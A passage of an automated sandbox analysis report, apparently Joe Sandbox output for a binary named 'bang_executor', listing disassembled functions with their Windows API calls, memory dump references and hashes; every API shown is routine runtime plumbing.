                                        • _free.LIBCMT ref: 0050AB00
                                        • _free.LIBCMT ref: 0050AB07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                        • String ID: pbT
                                        • API String ID: 400815659-2424122762
                                        • Opcode ID: 0d7a5f4efb6df45523e249a137bff5fccf166aa9969af96af321d944d831011d
                                        • Instruction ID: 9b0675e34fdd588cad0721b22aeb1e9b0375146dda301bfcc9b9bc25161e47cb
                                        • Opcode Fuzzy Hash: 0d7a5f4efb6df45523e249a137bff5fccf166aa9969af96af321d944d831011d
                                        • Instruction Fuzzy Hash: D6E0E526B0960365E66176BE6D4BFDE1E557BC2335B200A15F825861C2DE9088055093
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,004EF306,00000001,?,?,?,00000000,004F7564,?,?,?,?), ref: 004EB9DE
                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004EBA25
                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,004EF306,00000001,?,?,?), ref: 004EBA51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: b249deaf58b5bdc2890773596a9df77840271f70f4f86388828486d506b13581
                                        • Instruction ID: 9e380cf33cd89876c44cee80257c9ac2e7eb3e5c0fc2fb8121781c74a040ef2c
                                        • Opcode Fuzzy Hash: b249deaf58b5bdc2890773596a9df77840271f70f4f86388828486d506b13581
                                        • Instruction Fuzzy Hash: 8D31A271208385AFDF14CF15D848BAB77A5FB81716F044A2EF58157290CB789D48CBE6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EBEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004EE1EC: _wcslen.LIBCMT ref: 004EE1F2
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,004EBBD0,?,00000001,00000000,?,?), ref: 004EBF12
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,004EBBD0,?,00000001,00000000,?,?), ref: 004EBF45
                                        • GetLastError.KERNEL32(?,?,?,00000000,004EBBD0,?,00000001,00000000,?,?), ref: 004EBF62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                        • String ID:
                                        • API String ID: 2260680371-0
                                        • Opcode ID: 5772097a335126221e50021643e5b9dbceda9c4e21eab005c47b3c93b3fb6ce1
                                        • Instruction ID: 74f518a0a8bff2d69b95cd071eb851407ae02a4a8a92b07004b218b1114e15a5
                                        • Opcode Fuzzy Hash: 5772097a335126221e50021643e5b9dbceda9c4e21eab005c47b3c93b3fb6ce1
                                        • Instruction Fuzzy Hash: DA11C631604294AADB11AB738C09BEF7798DF1D702F00449AF901D6291DB2CDE45CEED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050DEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0050DF08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        • Opcode ID: db2b7f2a49170b5a320c95cee2d3ffd79b1861f5f7535e4458dcd93884efa989
                                        • Instruction ID: 6c530edb241e1381af523b9306643119b162994abeaf35677cb0513f31d2b418
                                        • Opcode Fuzzy Hash: db2b7f2a49170b5a320c95cee2d3ffd79b1861f5f7535e4458dcd93884efa989
                                        • Instruction Fuzzy Hash: 11411A7050428D9ADF218E648C99BFEBFB9FF45304F2448ECE59A86182D275AA45DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050D5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0050D62D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        • Opcode ID: 6830b010255f97809229f1538c1caf0ca289e90294ea3dae79848af16618ca2b
                                        • Instruction ID: e40a7394492347429139a922de453951f2bdc736ffa5c877228867f7ed49d95b
                                        • Opcode Fuzzy Hash: 6830b010255f97809229f1538c1caf0ca289e90294ea3dae79848af16618ca2b
                                        • Instruction Fuzzy Hash: 59011336601209BBDF126F90DD0ADEE7F72FF58710F044114FE18261A0CA728971AB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050D55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0050CBBF), ref: 0050D5A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        • Opcode ID: 3bf83266ca8221f399989bc916f1bb0e2add5ea281cac7472554e7f62246ebfa
                                        • Instruction ID: 13d3b5f71f015f5b0c9a7ad5b99cc34ac255dfbdf9d19bdaabc783c325d96187
                                        • Opcode Fuzzy Hash: 3bf83266ca8221f399989bc916f1bb0e2add5ea281cac7472554e7f62246ebfa
                                        • Instruction Fuzzy Hash: 9AF0B43568221DBBDB126FA4DD06DEEBF61FF68710B004165FC04561A0CA754E50EBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050D3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        • Opcode ID: 6ea507ea87f0b50f6a87663b7fa55c585d6d84f59a14c47f73b14d80d0492f5d
                                        • Instruction ID: 8c5b7b8ac3722675ca90ededc032afd7219eae0dab87cc3a70f274087e0f1071
                                        • Opcode Fuzzy Hash: 6ea507ea87f0b50f6a87663b7fa55c585d6d84f59a14c47f73b14d80d0492f5d
                                        • Instruction Fuzzy Hash: B6E05534686259B7E6126BA49C06EADBF65EBA8720F010169FC0512280C9B45E40A29A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005010A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005010BA
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 3To
                                        • API String ID: 1269201914-245939750
                                        • Opcode ID: 436de927b89b44cf469f62f893459e749d6bf3656526182359c5eb8715b0a642
                                        • Instruction ID: bd4cd0bf21e232694ecdb8fa924e0675ce0113b9ab0551a3ecaf55fa756f238e
                                        • Opcode Fuzzy Hash: 436de927b89b44cf469f62f893459e749d6bf3656526182359c5eb8715b0a642
                                        • Instruction Fuzzy Hash: ECB092A229D501AD72242144A91A87A0A08F2C4B143209A2AF484C00C095402CC41033
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 1b9fbbe70b55f9b3ddd9587e2b30b2f92c062d0ed721c26e84f2d01f23571442
                                        • Instruction ID: e0f1a3978abb402d59d4545a88b451d2c75812cd35aa3b5f25929f5bdec0984d
                                        • Opcode Fuzzy Hash: 1b9fbbe70b55f9b3ddd9587e2b30b2f92c062d0ed721c26e84f2d01f23571442
                                        • Instruction Fuzzy Hash: F1B012D239C501ECB20451999D16E7F0E8CF2C4B15B30B83AF444C00C0D8411C438132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: a5b15196bc0f57de467cbc5256ba7df73ee53495367e85152fc326a556b51ed2
                                        • Instruction ID: 3a640aecc29957b7ea77ad9669f4b4f1ce004b87d3e369e27c4b48f9bbf37e13
                                        • Opcode Fuzzy Hash: a5b15196bc0f57de467cbc5256ba7df73ee53495367e85152fc326a556b51ed2
                                        • Instruction Fuzzy Hash: B4B012D23AC601FC734451999C16E7E0E8CF2C4B15B30B92AF044C00C0D8401C814132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A8E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 0ce1daf717b459e57e980d325e86ff66c91c5355c08cc5188c0b1034a84e5680
                                        • Instruction ID: eddd659015b8b30c302dcddccf8ebef187b3cae389465504186f986daeb13cd0
                                        • Opcode Fuzzy Hash: 0ce1daf717b459e57e980d325e86ff66c91c5355c08cc5188c0b1034a84e5680
                                        • Instruction Fuzzy Hash: B3B012D239C501FC720451999C16E7E0E8CF2C4B15B30F82AF444C10C0D8401C4D4132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 90fab09e8222c613238a4a6c529054a81cd1b9ba6b0aa0d77c74654a6c1a97dd
                                        • Instruction ID: 37ef5aede3f97358d9d586fdf0994c3fd2fc6578f88d403e4b9edbda3410e6ee
                                        • Opcode Fuzzy Hash: 90fab09e8222c613238a4a6c529054a81cd1b9ba6b0aa0d77c74654a6c1a97dd
                                        • Instruction Fuzzy Hash: 06A002D6799501BC711551959D1AE7E0B5CF5C0B15B30A919F545D40C1684118455131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 53ddd8186f785655e33e784aa630b8f327bb5ed95d92d83e3c1d179f393602c7
                                        • Instruction ID: 432899cbcc7f0968c79e7be3ac8101e936f0e04cb707eec90aca30af5c403aa4
                                        • Opcode Fuzzy Hash: 53ddd8186f785655e33e784aa630b8f327bb5ed95d92d83e3c1d179f393602c7
                                        • Instruction Fuzzy Hash: EEA002D679D502FC711551959D16D7E0A5CF5C4B55B30AD19F445C40C1584118455131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A6B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
